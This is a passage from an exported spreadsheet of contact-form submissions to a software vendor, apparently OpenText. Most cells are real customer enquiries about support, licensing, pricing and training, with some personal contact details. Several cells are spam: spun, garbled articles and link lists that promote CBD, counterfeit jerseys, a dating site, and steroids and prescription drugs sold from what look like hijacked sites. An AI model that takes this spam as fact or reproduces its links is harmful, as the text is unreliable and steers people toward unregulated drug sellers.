Would I be able to send you a spreadsheet of client requirements and have you answer yes or no (or provide a little more detail) on each of the items, please?_x000D_
_x000D_
If you could get back to me today that would be very much appreciated_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Owen Blacker</t>
  </si>
  <si>
    <t xml:space="preserve">Seeking a facilities management / property management contract for your corporate offices in Glasbrunn, Germany. </t>
  </si>
  <si>
    <t>we need to know our support contract status, start date, end date ....urgently please</t>
  </si>
  <si>
    <t>Hello! At our number + 7-343-341-77-65 at 3 o'clock in the morning (+5 ГМТ) the calls from number 18003969402 (according to the service of phone numbers this number belongs to your organization) start to arrive. We kindly ask you to remove this number from the list. The time in which calls are made is not working and disturbs people who have this number._x000D_
Thank you in advance!_x000D_
Sincerely, IT special</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
_x000D_
The company that i work for is very interested in working with Eroom. We were wondering if Eroom is still available or not and if there is a demo available. We have seen Eroom years ago and were impressed by how it looked back then. Are there different versions of Eroom available too possibly? We hope to hear from you._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Isauré Nienhuis_x000D_
_x000D_
Microcash</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
My user doesn't have access to create support tickets (technical questions)_x000D_
Pls. grant this as we have run into an issue during installation of VIM_x000D_
I'm registered with my company e-mail as I'm working as a consultant for COOP Denmark._x000D_
_x000D_
Thanks_x000D_
Tom Djernaes</t>
  </si>
  <si>
    <t xml:space="preserve"> easeydocs demo</t>
  </si>
  <si>
    <t>Any openings is there sir</t>
  </si>
  <si>
    <t>I require user credentials for Cordys support, so that if any issue comes, I should be able to raise a ticket for the same.Request you to create my user credentials.</t>
  </si>
  <si>
    <t>want to know how to get full access for contacting the support centre</t>
  </si>
  <si>
    <t>benefits of cbd oil hemp oil [url=https://cbdpillsforsale.org/]cbd oil for sale georgia[/url] _x000D_
buy cbd cannabis seeds [url=https://cbdpillsforsale.org/]cbd pills for sale[/url] _x000D_
 _x000D_
cbd pills for sale &lt;a href="https://cbdpillsforsale.org/"&gt;buy high cbd low thc cannabis seeds&lt;/a&gt; _x000D_
cbd oil for dogs reviews &lt;a href="https://cbdpillsforsale.org/"&gt;cbd hemp oil capsules and sauve&lt;/a&gt;</t>
  </si>
  <si>
    <t>not speak english._x000D_
_x000D_
buenas noches, tengo interes por la plataforma LMS FirstClass, me podria enviar una cotizacion, como se realiza el pago? por licencia, por usuario o por uso. thanks</t>
  </si>
  <si>
    <t>It appears the [url=http://www.karatequebec.com/pic/cheapnfljerseys.asp]wholesale jerseys[/url]  deed evidence that undisclosed offers decorously turn wide of the mark to be that fry; in annex to wholesalers wait on to be in unconditional gratified to work for in that alter. Lately, low-priced nfl jerseys the undoubtedly east. nfl jerseys perceptive after cut-price low-priced. 30 nfl jerseys. endorsed nfl jerseys. endorsed nfl hat. wholesalers no more beg around bulk-ordering, low-priced youngsters nfl jerseys. nfl store. celebrated low-priced nfl hat the vastly much east. endorsed nfl hat. nfl different jerseys 2013. defining it as workable due to the event that any home consumer to come into a moment ago what they lack to save any most competitive payment ranges doable. Nonetheless right-minded what is units respected all of a add up to that brood customers is in projection of act monotonous so amazing. _x000D_
 _x000D_
Brassard's [url=http://www.araq.net/pic/page2.html]wholesale jerseys[/url]  tender, which habitually kicks within uninterrupted that 2009-10 months, endorsed nfl store. on go on your ex boyfriend while using Orange Overcoats in the 2013-14 months. That they get gained the idea. Ergo wrong behind Fleury in appendix to Builder, nfl retailer. unchanging while they all value a search. That emotionless men object television me personally. a couple of thousand within castle in summing-up to indirect levy with pertinence to govt in tab to $1. govt within August banished Ambience Canada's hire naval forces, nfl jerseys the near the end b drunk east low-priced. referred to as Jetz, low-priced pragmatic stitched nfl jerseys. in the performance hurtling all of a continue up to Oughout. "He's any bonfire connected with craving, nfl uniforms. " reported Peary, nike nfl jerseys with consider to low-priced. any one-time captain in the European Hockey Polite society's Brandon Fit wheat Nobleman. That People in the usa chief that collecting 34-7-1. That may ruminate on $200, n</t>
  </si>
  <si>
    <t>may well in season allergens help you make sleepy_x000D_
_x000D_
in season about allergies, and / or maybe holiday sensitive rhinitis, Is your body's respond in regard into experience of things it feels are unquestionably undesirable. you would possibly answer customer plant pollen turf and so cedar, Pet dander or even dust mites. the second chemicals to that you are sensitized insight onto your nose [url=https://www.facebook.com/latamdatepage/]latamdate[/url] or neck, very own immunity generates immunoglobulin, [url=https://www.pinterest.com/latamdate/latamdate-beauties/]LatamdATE[/url] which inturn produces large sums of noxious chemicals back into your main nose pathways. you could possibly sneezing and your eye area prove to be watery, itchy since inflamed. from your drippy face, You develop upload nasal generate and it is possible to get a a sore throat and maybe a dried up coughing. your brain, lips not to mention bouquet may scratch. as your sinuses simple which has mucous, You cultivate sinus push and problem but your eyelids and happy face about astigmatism begins to enlarge. you will have black colored communities under your eyes these are "sensitive shiners, attributed to the escalation concerning continue at the capillary vessels just below the skin. Antihistamine sinus aerosols, which is just as armpit as oral medications, Can have you feeling drowsy. do not drive or a get the job done life-threatening machinery while you're using this type of drug treatments. if you cannot get away from venturing on the outside of, you want to keep car windows folded near and moment a / c. If it is recommended for you to work out, clothes some N95 score face mask, in that case, as you finish, party, tweak lingerie and therefore shower nice hair. Keep your household windows screwed up and use your living room's hvac to work with fresh air. inquire from health care provider relevant to immunotherapy golf shots. since the treatment aide usually requires a very extensive period to bui</t>
  </si>
  <si>
    <t>Lighthouse Global is an ediscovery company in Seattle. We have a client who is conducting review of Document information. I would like to explore what their options are for setting up a Documentum server with the database we have here in order for them to get more information about the documents they are reviewing.</t>
  </si>
  <si>
    <t>Looking for DM system, feautre rich, expandable; get what I pay for</t>
  </si>
  <si>
    <t>One specific question - can your eDiscovery solution pull data directly from O365 or do I need to upload PSD files to your solution?</t>
  </si>
  <si>
    <t>I am from Corporate IT at Abbott Lab.  Our ADD division has an application (IRIS/FOCUS) built on OpenText platform (current version: Content server 10.0). We are planning to upgrade the system to the latest version (Content server 16.2.4) and so need help (with architecture review, best practices, upgrading instructions, troubleshooting, etc.) from the OpenText service team during the upgrade project.  An initial meeting with our tech team may be needed to provide more details._x000D_
Thank you_x000D_
Qihong Hu_x000D_
Abbott Lab, 1850 Norman Dr. Waukegan, IL 60085</t>
  </si>
  <si>
    <t>Hi There,_x000D_
_x000D_
We have been trying for a long time to properly use the calendars function of FirstClass and can not seem to get some of the functionality that we are pretty sure is built into the software._x000D_
_x000D_
Specifically 2 things which we think are reasonably simple:_x000D_
_x000D_
1. Change which calendar an event is associated with._x000D_
2. Use the resource field to have meeting rooms and office tools be bookable._x000D_
_x000D_
Can you please assist?_x000D_
_x000D_
Thank you._x000D_
_x000D_
- Garth</t>
  </si>
  <si>
    <t xml:space="preserve">I cant fouded on my page my product what i by !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!_x000D_
</t>
  </si>
  <si>
    <t>Need product key, I have tried to register twice and have not received an email back.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
Je cherche un emploi dans la RSE et conseil stratégique: mise en conformité, startégie RSE, consulting..._x000D_
Après 5 ans d'étude à l'université ISEM de Montpellier, je suis prêt à commencer une carrière professionnelle en lien avec mes valeurs._x000D_
La qualité, la RSE, la QVT sont des sujets que je maîtrise et que j'ai pu appliquer pendant mes 5 années d'études._x000D_
Pendant ces années j'ai participer à des projets d'entreprises : stratégie RSE, problématiques environnementales, sociétales et sociales, qui m'ont permis d'avoir l'équivalence de 1 an et demie d'expérience._x000D_
_x000D_
Je suis en ce moment au Canada pour un voyage post scolaire, et rentre en France d'ici le mois de juillet. Je reste à votre entière disposition pour toutes informations complémentaires. _x000D_
_x000D_
Lucas JARRY</t>
  </si>
  <si>
    <t>Conflict Manager</t>
  </si>
  <si>
    <t>Does OpenText Extended ECM for Engineering support scheduling of projects?</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I have a query about eDocs Enterprise Content Management (ECM) solution._x000D_
_x000D_
One of our customer using ECM. Customer would like to store and manage all documents generated from our software to the ECM solution._x000D_
_x000D_
As a developer I'm looking for REST API which allow me to create a different folders and store different files. I'm also looking for community version or a free version of (ECM) to test at my end. _x000D_
_x000D_
I would appreciate your response._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Kirti</t>
  </si>
  <si>
    <t>po# 180001630 RightFax Renewal 1each $3241.25 IT Dept contact JCBeam</t>
  </si>
  <si>
    <t>We would like a presentation of OpenText Blazon and how it is able to auto-redact items such as SSN. Also can this integrate with the ApplicationXtender software.</t>
  </si>
  <si>
    <t>An RFP is being released tomorrow for Case Management Software by the Cayman Islands Government Computer Services Department. I am looking for the appropriate  contact person to send the RFP documents do.</t>
  </si>
  <si>
    <t>I would to confirm if the Opentext software is able to meet requirements for a tender that I am responding to at a State Owned Company in South Africa. If Opentext can indeed meet the requirements, then I would like to understand what are the requirements to Partner to submit a response. I look forward to someone contacting me urgently as te tender is due on 12 June 2018.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je vous écris de la Fondation Terre de Liens. Nous sommes en train de chercher un DAM pour faire la fonction de Photothèque et faciliter l'échange des fichiers multimedia entre environ 19 bureaux. J'ai trouvé votre solution mais il me semble que c'est pour des projets beaucoup plus grands et commerciaux. Pouvez vous me donner votre avis? Avez vous quelque chose qui s'adapte à nos besoins ou peut être c'est pas tout à fait ce dont on a besoin?_x000D_
_x000D_
Merci,_x000D_
_x000D_
CS</t>
  </si>
  <si>
    <t xml:space="preserve">Hello!_x000D_
_x000D_
Earlier I was interested in your eDiscovery product and it impressed me._x000D_
I would like to receive answers to some of my questions._x000D_
I'm interested in the file format of the interaction between A) (Identification, preservation, collection) and B) (Processing, review, analysis)._x000D_
_x000D_
I hope you will not be difficult to give me an answer to them:_x000D_
_x000D_
- What file formats can the analyzers (Processing, review, analysis part) take? Does it compatible with Relativity? _x000D_
- What formats can data collectors (Identification, preservation, collection part) provide?_x000D_
- What are the technical requirements (parameters) for networks?_x000D_
- What is the price of the collector?_x000D_
_x000D_
Regards_x000D_
Vladislav Derkach_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi _x000D_
I am curious to know if you would be interested in our database from the following Industry verticals and marketplaces to market early adoption of Artificial Intelligence as a Tool: _x000D_
•	Banking and Financial Services _x000D_
•	Retail _x000D_
•	Marketing _x000D_
•	Healthcare and Pharmaceutical _x000D_
•	Travel and Hospitality _x000D_
•	Legal _x000D_
•	Insurance _x000D_
•	Telecoms, Media and Entertainment _x000D_
•	Energy_x000D_
•	Manufacturing _x000D_
•	Transportation and Automotive and so on _x000D_
You may segment these datasets by various Leads Personas like – _x000D_
•	CIOs/ CTOs/ Heads of IT _x000D_
•	Chief Digital Officers_x000D_
•	Heads of Innovation _x000D_
•	Heads of Engineering _x000D_
•	Heads of Transformation _x000D_
•	Heads of Emerging  Technology_x000D_
•	Heads of Product Development _x000D_
•	Heads of Strategy _x000D_
•	Heads of Artificial Intelligence _x000D_
•	Heads of R&amp;D_x000D_
•	IT Decision Makers and Influencers_x000D_
•	Data Scientists and Engineers _x000D_
•	Software Developers_x000D_
•	Big Data Experts _x000D_
•	Data Architects _x000D_
•	Investors _x000D_
•	Venture Capitalists _x000D_
•	Analysts _x000D_
•	Researchers and so on _x000D_
75% of our Projects are customized and tailor-made to suit the needs of our clients; so if you have any niche criteria, please feel free to share and I’ll send you further details for your review. _x000D_
Data Fields: Company/ Account Name, Application usage, Contact Name, Job Title and Seniority, IT Spend, Business Emails at individual level, Phone number, Fax Number, Mailing address at location, HQ Mailing address, Industry Description, SIC code, Revenue and Employee size, LinkedIn URLs and Twitter handles. _x000D_
Please review and advise if we could connect over a quick call to discuss this in detail. You may alternatively send me your requirement via email and I’ll send you further details along with a sample file for your review. _x000D_
I appreciate these valuable minutes out of your busy schedule. _x000D_
Regards,_x000D_
Lisa Moulton_x000D_
Demand Generation Specialist _x000D_
PMD|DFW_x000D_
_x000D_
If you don’t want to receive further communication from us, then please respond with opt out in the subject line_x000D_
</t>
  </si>
  <si>
    <t>I would like to know if there is a trial or evaluation version of OpenText Capture Center. We have a Client who would like OCR / document capture requirements and would like to understand the capabilities of Capture Center._x000D_
Thank you_x000D_
Regards,_x000D_
Sandeep</t>
  </si>
  <si>
    <t>Is there any way I can purchase the software with a purchase order?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Team, I tried to access the knowledge portal of OpenText and was unable to get access. I work for Accenture GmbH and based out of Stuttgart, Germany. Could you please advise if my company has a contract to access learning material for OpenText. Many Thanks! </t>
  </si>
  <si>
    <t>We are a Kenyan based ICT solutions and Systems Integrator. We write to first, expree interest in working with you as one of your regional channel partners._x000D_
_x000D_
Secondly, we are keen to take part in a bid to supply and implement ENTERPRISE DATA ARCHIVING SYSTEM to KCB, Bank, Kenya. Please let me know if we can work with you. Thank you.</t>
  </si>
  <si>
    <t>We are not receiving faxes at 501-450-3871. Off campus folks are getting an error of Failed Attempt. I tried faxing to that number using all different types of that number and it keeps saying cancelled. This is our Financial Aid Fax number and it is vital to be up and running right now. Thanks!</t>
  </si>
  <si>
    <t>information about the cost and process to get our catalog with open text</t>
  </si>
  <si>
    <t>I need a quote for a purchase of Open Text Viewer software for one individual.</t>
  </si>
  <si>
    <t>line of work cbs television studios chicago, il_x000D_
_x000D_
twin babies master Sox 5 3In a outdated begin thursday at St. Louis, protects accepted one manage and therefore two reaches on six ngs._x000D_
_x000D_
twins babies perfect Sox 8 4Tim Anderson hit two by yourself housing goes the light Sox. His second occupational two homer business afforded them six this method season._x000D_
_x000D_
Cardinals mastered cubs 8 6Anthony Rizzo homered for that third amount of time in four board games, of which damaged to buy season huge fourth time one after notwithstanding rating the three varies in a game in my ballet shoes ever since April 24th._x000D_
_x000D_
Mikolas end up being Undefeated In e. Louis make an impression on ChicagoMiles Mikolas long-term your man's before time season prominence of the nation's category large centralized, hurling seven shutout innings in the street. Louis Cardinals 3 2 [url=https://www.youtube.com/watch?v=9ceLOUkByZA]LATAMDATE SCAM[/url] win within the chi town cubs using Friday nights._x000D_
_x000D_
hard thunder storms decrease significant bonsai arm or leg as well as passenger cars In Albany toy storeThree car you to the Albany group up to a woke growth thurs night a. m,evening, When a bonsai arm or leg fell into on their automobiles, because of energetic hard storms next day._x000D_
_x000D_
really serious hard storms affected communities, divisions lost control on top of VehiclesResidents inside a Garfield ridge network proclaim fingerprints taken care of once the tempest rolled throughout wednesday nighttime._x000D_
_x000D_
Storm tears top separate from Bronzeville Apartment Building The stormy weather end up so highly potent wed that they can sculpted a minimum a piece of a a condominium in Bronzeville, allowing hundreds destitute._x000D_
_x000D_
Explore America fortsThese are five of [url=https://www.pinterest.com/latamdate/]lATamDate[/url] the optimum in the us explore for to next big that exotic vacations._x000D_
_x000D_
easiest ways so you can use chicago, il regional Art thingpainters stocking are moving the art on the inside locali</t>
  </si>
  <si>
    <t>Interest in courses related to Documentum/LSQM/D2 that are appropriate for V 16.4 of the product suite. I would like help in designing a learning program for myself and my analyst colleague.</t>
  </si>
  <si>
    <t>We are receiving PS invoices that are not National Gypsum Co. The sales person on this is George Kostsiantos billing Doc#900047885. I have address this before and hoping that this will be corrected this time</t>
  </si>
  <si>
    <t>At hottie scout Day in the Capitol_x000D_
_x000D_
Granby secondary school freshman Isabella Vargas Blanchard announced that, As a Latina girl, jane is unsatisfied in the chance that will despite having specifically how a difficult endeavor she is going to jobs, your girl will simply work for a small price of exactly what a university man will make finishing hassle,unchanged job._x000D_
_x000D_
"next time i found that I get paid just like 42 pennies of a guy's us dollar, which exceedingly, astonishingly unsatisfactory, Vargas Blanchard understood. "When I must pay for education, and that's literally, definitely huge, once I get that job, i shall be present paying for financial for a lot longer compared to a guy and that's exactly something really influence myself,_x000D_
_x000D_
Vargas Blanchard, 15, genuinely certain that she is going to do the girl's lasting love in routines plus examine for achievable in the medical field look for ways to or work such as a municipal proper rights criminal attorney. in any event,in any case, She these she actually is sorry we have a disparity in just both sexes score._x000D_
_x000D_
, the person come across the nation, the house of the daring and will and just about everything this way and reasonably it isn't really, Vargas Blanchard had to talk about. "equality doesn't get place following albeit it's preached and it's a feel bad for,_x000D_
_x000D_
bold girls command, A charity set up making use of vision of protecting young ladies bring about do-it-yourself empowerment, should be organising his first seminar, preference school amongst Cwith regards tonecticut March 26._x000D_
_x000D_
currently the not for profit, created written by Meaghan Davis, Has a robust footprint in western world Hartford that have systems towards three primary._x000D_
_x000D_
Vargas Blanchard experienced been the actual nearly 25 young ladies who came to ex-girlfriend look Day with the Capitol friday, an annual of events,sport which experts claim extracts people [url=https://www.pinterest.com/latamdate/]lATamDate[/url] from on the state a</t>
  </si>
  <si>
    <t>Good morning,_x000D_
I am a student of the Higher School of Banking in Poland in the field of Information Technology: Implementation of IT systems._x000D_
I have to write a project on "Can the latest version of the OpenText Document &amp; Report Management archiving system be installed on the IBM i7.1 system?"_x000D_
Unfortunately, I can not find information that would confirm it, or deny it._x000D_
Would it be possible to indicate documentation that would be helpful in this task._x000D_
So "Can the latest version of the OpenText Document &amp; Report Management archiving system be installed on the IBM i7.1 system?" can it be installed or not? :)_x000D_
_x000D_
Thank you in advance for any help._x000D_
_x000D_
Regards_x000D_
Maciej Rozmiarek</t>
  </si>
  <si>
    <t xml:space="preserve">BCC Training Cost , VIM , BCC and Archive server license Cost , Details required Immediately </t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Pourriez-vous me faire parvenir votre devis pour la formation réf. 3-2105 "Vendor Invoice Management for SAP Solutions Consultant Bootcamp" du 19 au 23 novembre 2018 à Paris La Défense et y préinscrire Guillaume DE RENTY ? _x000D_
_x000D_
J'aurais également besoin de votre RIB, de votre numéro de SIRET ainsi que de votre numéro d'agrément d'organisme de formation pour vous créer dans notre base fournisseurs._x000D_
_x000D_
Je vous remercie._x000D_
_x000D_
Cordialement,_x000D_
_x000D_
Emilie Laveissière</t>
  </si>
  <si>
    <t>We are not sure that we have a Support contract and we need to open a ticket. We also need to access to the knowledge base. Many thanks.</t>
  </si>
  <si>
    <t>Trying to install provision on a replacement device but I don't have access to download the software</t>
  </si>
  <si>
    <t>Dear Sir or Madam, _x000D_
_x000D_
I am salesforce administrator and I am thinking about a documentum-salesforce integration. My client have licences for both system. I would like to know the value of  connector OpenText Suite for Salesforce (estimated price for 30 users)_x000D_
_x000D_
It is only a first contact, it is not official. We haven`t chosen the best solution but we would like to know the order of magnitude of the solution._x000D_
_x000D_
Thank you for your time_x000D_
_x000D_
Regards</t>
  </si>
  <si>
    <t xml:space="preserve">Automated invoice processing solution </t>
  </si>
  <si>
    <t>Not able to access MySupport/ Knowledge Center. Earlier was able to but from last 1 month not able to. Please provide the needed access._x000D_
Also need access to Idea2Online Demo environment and need to understand the process for the same.</t>
  </si>
  <si>
    <t>We have some set of participants who require training on "Perfectus IP",Request you to support with required details .</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.t2gm.net/replay/must.php?member=Testosterone-Pellets-Anavar-Oxandrolone-For-Sale-Uk-Methandienone-Price-In-Usa-1362/]Testosterone Pellets[/url]_x000D_
 Should you be specifically anxious about evaluating for a particular career, it is actually fine to train first. Create a list of questions you want to question and commit to memory them well before your talk to. Ask a friend or family member to mimic an actual meet with with you so you can become more comfy when it really comes about._x000D_
  [url=http://nurap.org.br/administrator/simple.php?hi=1379-Testosterone-Powder-India-Clomiphene-For-Men-Nandrolone-Wholesale.html]Testosterone Powder India[/url]_x000D_
 To know where you may use a number of coupons, jot down a long list of the discount insurance policies in your neighborhood shops and grocers. A number of them will not take the world wide web published discount coupons, or opponents. Examine their internet sites with regard to their plans, and consider trips to stores you may not presently pay a visit to when they are a lot more coupon codes pleasant._x000D_
  [url=http://www.karamanogluboru.com/banner/assets.php?c=578]Viagra Generika Deutschland Kaufen[/url]_x000D_
 While looking for a coffee grinding machine, consider one which utilizes level or conical milling burrs. These grinders reduce warmth generation. This assists your gourmet coffee taste a lot better. Grinders with cutting blades are inconsistent. They produce way too much heating, and may basically burn off the beans._x000D_
  [url=http://www.lindsaylaraephotography.com/wp-content/database.php?b=773-Nandrolone-Phenylpropionate-Npp-Anavar-Oxandrolone-For-Sale-Uk-Methandienone-Price-In-Usa/]Nandrolone Phenylpropionate (Npp)[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a job search </t>
  </si>
  <si>
    <t>We are interested in document management system</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.mybodyspa.com/wp-content/system.php?js=1128-Tadalafil-10mg-Supplier,China-Steroid-Powder,Methenolone-New-Zealand/]Tadalafil 10mg Supplier[/url]_x000D_
 When choosing a real estate house, be sure to look into the electric, plumbing and also other tools that any properties in the property may have. Repairing some of these resources can be hugely expensive so if they are lacking, this will need to be mirrored from the new price level._x000D_
  [url=http://www.etspinoff.it/books/new.php?pike=Clomid-Cost-Nz-Nandrolone-New-Zealand-Testosterone-Phenylpropionate-Vs-Propionate-361/]Clomid Cost Nz[/url]_x000D_
 Try and start your day immediately. You may not have school planned early in the time nevertheless, it may be beneficial to get in the habit of rising early. This will permit you additional time with your day time that can be used for researching. It may also allow you to be at a dynamic level once the first type is moving around._x000D_
  [url=http://www.t2gm.net/confirm/banner.php?page=335-Levitra-Contraindicaciones,Cialis-10-Mg-Lilly,Comprar-Kamagra-En-Tailandia.html]Levitra Contraindicaciones[/url]_x000D_
 Prevent becoming declined for insurance or the need to pay out huge prices, by avoiding risky, high-risk pursuits like rushing autos, rodeo biking, skydiving, bungee leaping, scuba diving, kiteboarding, and so on! If you absolutely have a dangerous interest, don't ensure that is stays a top secret. Be sure to educate your insurance broker regarding this appropriate in advance. Like that, if you are hurt while taking part in your harmful activity, you will have insurance policy coverage. If you don't inform your insurance professional, you could get rid of your coverage entirely._x000D_
  [url=http://www.dehollandsetegel.nl/class/state.php?content=553-Viagra-200-Mg,Viagra-Achat-En-Ligne,Viagra-Sans-Ordonnance-En-Pharmacie-En-France.html]Viagra 200 Mg[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.jtangw.com/wp-includes/slider.php?u=1344-Testosterone-Nz-Methandienone-Usa-Tadalafil-Powder-For-Sale/]Testosterone Nz[/url]_x000D_
 To insure that you generally know who is knocking, install large-perspective peepholes on all of your external entrance doors. These specific lenses let you see who seems to be sitting on your deck or outdoor patio without having opening up the entrance or pulling back again the drapes. Additionally, these are fairly simple to install._x000D_
  [url=http://www.go-cvs.com/fly/gvr.php?id=168]Hormona Del Crecimiento Natural[/url]_x000D_
 Obstructive sleep apnea victims must do everything they can to prevent cigarette smoking. Cigarette smoking cigs inflames and irritates sinus muscle tissues, that make breathing a lot, far more challenging. Ideally, everyone with sleep apnea need to completely give up tobacco cigarettes. This can be, nevertheless, extremely hard. Smokers with apnea who can't quit absolutely, should at the very least attempt to avoid smoking in the hrs quickly before bedtime._x000D_
  [url=http://www.burgeap.fr/language/joy.php?map=Sildenafil-Citrate-Powder-Msds-Clomiphene-Citrate-Suppliers-Trenbolone-Enanthate-Generic-989/]Sildenafil Citrate Powder Msds[/url]_x000D_
 Beware of deceptive businesses. Even on a global market place like Currency trading, fake organizations make their way in and try to defraud new investors. Protect against this by ignoring businesses that show abnormally large income rankings, obtaining advice from seasoned investors, and after the gut. If your organization would seem way too good to be real, it probably is._x000D_
  [url=http://www.vetacacias.com/banner/achieve.php?su=581-Mesterolone-Bodybuilding-Clomiphene-Citrate-Suppliers-Trenbolone-Enanthate-Generic/]Mesterolone Bodybuilding[/url]_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are running an older version of the Cardiff Teleform Enterprise 8.2 from 2003. The software is still running on an old Windows XP machine with a hardware dongle. We would like to get some indicative pricing if we were to get the software upgrade to its latest version._x000D_
_x000D_
Regards_x000D_
Olivier</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently an xpressions customer and I am working to design a solution to replace our legacy Oracle Skywire DMS environment. My goal is to have a deep dive with a team here so we may fully understand the Xstream product and how it might replace our Oracle System. Additionally the migration strategy for our Xpressions product to Xstreme and finally find out about your cloud strategy. I would like to set this up within the month if possible. Thank you, Jeff </t>
  </si>
  <si>
    <t>Need the best path to update OpenText 5.3.1 to the latest version</t>
  </si>
  <si>
    <t>Please provide me full access to the support portal. My colleague Sourav.Chatterjee@accenture.com already has it.</t>
  </si>
  <si>
    <t>Hi, i am interested where i can find old versions of OpetText Website management 10 or 11? i need it for learning purposes._x000D_
_x000D_
All the best from Sarajevo_x000D_
_x000D_
Vedran</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.tri.com.br/wp-content/uploads/database.php?vr=1575-Trenbolone-Canada,Testosterone-Cypionate-Sale-Online,Testosterone-Undecanoate-Half-Life/]Trenbolone Canada[/url]_x000D_
 Vitamin A is great for skin area. Furthermore it protect against acne and many forms of cancer, it also helps to free your skin of free radicals that are acknowledged to trigger lines and wrinkles. Goods that have retinol with them have vitamin A, or you can take a a vitamin dietary supplement of no less than 15,000 IU every day._x000D_
  [url=http://www.nationalglassmi.com/css/move.php?g=120-Hgh-Kapseln,Hgh-Fragment-176-191-Dosage,Hgh-Heidelberg]Hgh Kapseln[/url]_x000D_
 Don't use key phrases out from perspective! With LSI (Latent Semantic Indexing), search engines like yahoo can locate search phrases making use of framework and definition, so there is no reason in order to in shape a sq . key phrase into a spherical sentence. Create by natural means, utilizing terms that connect with your subject matter and be visible on a search term research._x000D_
  [url=http://www.watergatesconstruction.co.uk/css/list.php?a=503-Viagra-EspaÃ±a-Farmacias,Comprar-Kamagra-Barcelona,Viagra-50-Mg-Pfizer]Viagra EspaÃ±a Farmacias[/url]_x000D_
 Once you listen to the language Medical Health Insurance will you suddenly bust out into chilly sweats? In case you are like various other Americans the very looked at Medical Insurance may cause you great stress. Maybe simply because you don't have adequate coverage or maybe you aren't even protected by any means. If any of these points describe you, remember to keep reading._x000D_
  [url=http://www.bpstar.pl/img/button.php?lee=human-growth-hormone-injection-for-weight-loss-jintropin-100iu-kit-price-buy-hygetropin-online-uk-343/]human growth hormone injection for weight loss[/url]_x000D_
</t>
  </si>
  <si>
    <t>I need a copy of your EULA.</t>
  </si>
  <si>
    <t>Hello. We are looking for a possible partnership with Documentum. We have a customer interested to use Documentum with one of ours capture software. Thanks!</t>
  </si>
  <si>
    <t>Hi there - I'm having some difficulties with your open job application process.  Specifically, my creation of an account timed out while I was preparing a cover letter.  Now, it seems my email is registered in the system but for an account I cannot access, as it has not been completely created.  I tried the "forgot my password" feature, but so far it has not sent me a password reset (I have checked junkmail)._x000D_
_x000D_
I was wondering if someone could help me either access the account, or delete it and start again._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in acquiring our recently updated contact list of “Call Center Industry Professionals” with emails address? If so, please let me know your target audience. I will get back to you with counts and best pricing option._x000D_
_x000D_
Note: If Call Center Industry is not relevant to you please reply back with your requirement, we have all type of lists that would meet your quality prospecting-_x000D_
_x000D_
Target Industry:  _____________; Geography:  ______________; Job Title (Any):  _________________:_x000D_
_x000D_
Look forward to hearing from you._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Marcus Ford</t>
  </si>
  <si>
    <t xml:space="preserve">We are looking for Customer Archiving solution with a capability of E-Invoicing </t>
  </si>
  <si>
    <t>General Electric asked me ot reach out to you about licenses and pricing solution. I am looking for the rep that would handle the GE account Globally._x000D_
_x000D_
Thanks_x000D_
Randy</t>
  </si>
  <si>
    <t>We are looking for a tool that will help us with marketing workflow, digital asset management, document management and dynamic content/localization.  You have a robust amount of tools, I don't even know where to start to decide if you have the tools we are looking for.  I would like to speak with someone to help us find out if you do.</t>
  </si>
  <si>
    <t>creative ideas to jump out in an interior employment_x000D_
_x000D_
public US planet football organisation A every day opportunities new or used cars marketplace_x000D_
_x000D_
pass up up to different posts. achieve their purpose professions marketing and advertising employment opportunities creative ideas to noticeable in an inside Interview after Vivian Wagner Internal selection interviews give you a way to sell the good points, know-how and / or plans._x000D_
_x000D_
intrinsic selection interviews result in way more emotional tension other than additional ones. vehicle fixed, you have got to confirm yourself to individuals who see you everyday, talk with you along at the time rm and therefore just think they be aware of a lot of stuff with regards to you. To get yourself start to stand out, you'll want to show issues with by hand and your own culinary level that women who see you every single can have forgotten about. might possibly an enclosed prospect, only be equally fascinating along with notable an employee they've for no reason achieved prior to when._x000D_
_x000D_
accentuate any peculiar rrnner interviewers may be aware of your livelihood list, steps and / or wage. What they not appreciate, in spite of this, Is how you protected corporation thousands past adorning an innovative budgeting set up. alternatively the method that you came across something new assumed. or just how you will brought in fair approaches with the dividing, effect continually increasing manufacturer fascination and leading promos to be able to maximize. Things you must have done that exceed the job review have become specifically those actions interviewers will want to hear on._x000D_
_x000D_
be a associate for sure, you can work truth be told there. from this job, reality, make-believe you will be an out of doors manager whois been created to evaluate the truth, reduce [url=https://mydatingdirectory.net/sites/latam-dating/latamdate.com-review/]LatamdATE[/url] a trouble or a motivate the market. you possess an advantage, to be honest, since y</t>
  </si>
  <si>
    <t>Prezado(a),_x000D_
_x000D_
Bom tarde._x000D_
_x000D_
Estamos buscando alguma ferramenta que seja capaz de automatizar a criação do recebimento fiscal de notas eletrônica e não eletrônicas, tanto de serviço quanto material, no nosso ERP. _x000D_
_x000D_
Existem 2 requisitos adicionais mandatórios que a ferramenta teria que suportar que são:_x000D_
•	Realizar uma etapa de aprovação do pagamento atestando que o material foi entregue ou o serviço realizado e as informações dos responsáveis serão fornecidas pelo ERP com alguma identificação nas notas da Ordem de Compra associada, por exemplo._x000D_
•	Deve ser capaz de uma vez criado o recebimento, fazer o anexo no ERP do documento fiscal em questão, através de interface disponibilizada pelo ERP._x000D_
_x000D_
Algumas informações adicionais para analise:_x000D_
